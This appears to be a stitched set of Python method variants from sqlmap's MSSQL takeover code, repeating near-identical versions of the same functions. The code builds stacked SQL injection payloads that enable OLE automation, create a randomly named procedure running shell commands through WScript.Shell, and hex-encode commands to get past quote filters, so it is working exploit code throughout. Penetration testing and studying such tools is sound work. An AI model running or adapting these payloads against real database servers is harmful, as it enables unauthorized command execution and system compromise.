def __xpCmdshellCreate(self): cmd = "" if Backend.isVersionWithin(("2005", "2008")): logger.debug("activating sp_OACreate") cmd += "EXEC master..sp_configure 'show advanced options',1;" cmd += "RECONFIGURE WITH OVERRIDE;" cmd += "EXEC master..sp_configure 'ole automation procedures',1;" cmd += "RECONFIGURE WITH OVERRIDE" inject.goStacked(agent.runAsDBMSUser(cmd)) self.__randStr = randomStr(lowercase=True) self.__xpCmdshellNew = randomStr(lowercase=True) self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew cmd = "DECLARE @%s nvarchar(999);" % self.__randStr cmd += "set @%s='" % self.__randStr cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT " cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 " cmd += "EXEC sp_OADestroy @ID';" cmd += "EXEC master..sp_executesql @%s" % self.__randStr if Backend.isVersionWithin(("2005", "2008")): cmd += ";RECONFIGURE WITH OVERRIDE" inject.goStacked(agent.runAsDBMSUser(cmd))
def __xpCmdshellConfigure(self, mode): if Backend.isVersionWithin(("2005", "2008")): cmd = self.__xpCmdshellConfigure2005(mode) else: cmd = self.__xpCmdshellConfigure2000(mode) inject.goStacked(agent.runAsDBMSUser(cmd))
def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None): # When user provides DBMS credentials (with --dbms-cred) we need to # redirect the command standard output to a temporary file in order # to retrieve it afterwards # NOTE: this does not need to be done when the command is 'del' to # delete the temporary file if conf.dbmsCred and insertIntoTable: self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True)) cmd = "%s > \"%s\"" % (cmd, self.tmpFile) # Obfuscate the command to execute, also useful to bypass filters # on single-quotes self.__randStr = randomStr(lowercase=True) self.__cmd = "0x%s" % hexencode(cmd) self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd) # Insert the command standard output into a support table, # 'sqlmapoutput', except when DBMS credentials are provided because # it does not work unfortunately, BULK INSERT needs to be used to # retrieve the output when OPENROWSET is used hence the redirection # to a temporary file from above if insertIntoTable and not conf.dbmsCred: self.__forgedCmd += "INSERT INTO %s " % insertIntoTable self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) return agent.runAsDBMSUser(self.__forgedCmd)
def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None): # When user provides DBMS credentials (with --dbms-cred) we need to # redirect the command standard output to a temporary file in order # to retrieve it afterwards # NOTE: this does not need to be done when the command is 'del' to # delete the temporary file if conf.dbmsCred and insertIntoTable: self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True)) cmd = "%s > \"%s\"" % (cmd, self.tmpFile) # Obfuscate the command to execute, also useful to bypass filters # on single-quotes self._randStr = randomStr(lowercase=True) self._cmd = "0x%s" % hexencode(cmd) self._forgedCmd = "DECLARE @%s VARCHAR(8000);" % self._randStr self._forgedCmd += "SET @%s=%s;" % (self._randStr, self._cmd) # Insert the command standard output into a support table, # 'sqlmapoutput', except when DBMS credentials are provided because # it does not work unfortunately, BULK INSERT needs to be used to # retrieve the output when OPENROWSET is used hence the redirection # to a temporary file from above if insertIntoTable and not conf.dbmsCred: self._forgedCmd += "INSERT INTO %s(data) " % insertIntoTable self._forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self._randStr) return agent.runAsDBMSUser(self._forgedCmd)
def _xpCmdshellConfigure(self, mode): if Backend.isVersionWithin(("2000", )): cmd = self._xpCmdshellConfigure2000(mode) else: cmd = self._xpCmdshellConfigure2005(mode) inject.goStacked(agent.runAsDBMSUser(cmd))
def xpCmdshellForgeCmd(self, cmd): self.__randStr = randomStr(lowercase=True) self.__cmd = "0x%s" % hexencode(cmd) self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd) self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) return agent.runAsDBMSUser(self.__forgedCmd)
def _xpCmdshellCreate(self): cmd = "" if not Backend.isVersionWithin(("2000",)): logger.debug("activating sp_OACreate") cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") inject.goStacked(agent.runAsDBMSUser(cmd)) self._randStr = randomStr(lowercase=True) self.xpCmdshellStr = "master..new_xp_cmdshell" cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr) if not Backend.isVersionWithin(("2000",)): cmd += ";RECONFIGURE WITH OVERRIDE" inject.goStacked(agent.runAsDBMSUser(cmd))
def __xpCmdshellCreate(self): cmd = "" if Backend.isVersionWithin(("2005", "2008")): logger.debug("activating sp_OACreate") cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") inject.goStacked(agent.runAsDBMSUser(cmd)) self.__randStr = randomStr(lowercase=True) self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True) self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self.__randStr, XP_CMDSHELL_NEW=self.__xpCmdshellNew) if Backend.isVersionWithin(("2005", "2008")): cmd += ";RECONFIGURE WITH OVERRIDE" inject.goStacked(agent.runAsDBMSUser(cmd))
def _xpCmdshellCreate(self): cmd = "" if Backend.isVersionWithin(("2005", "2008", "2012")): logger.debug("activating sp_OACreate") cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") inject.goStacked(agent.runAsDBMSUser(cmd)) self._randStr = randomStr(lowercase=True) self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True) self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew) if Backend.isVersionWithin(("2005", "2008")): cmd += ";RECONFIGURE WITH OVERRIDE" inject.goStacked(agent.runAsDBMSUser(cmd))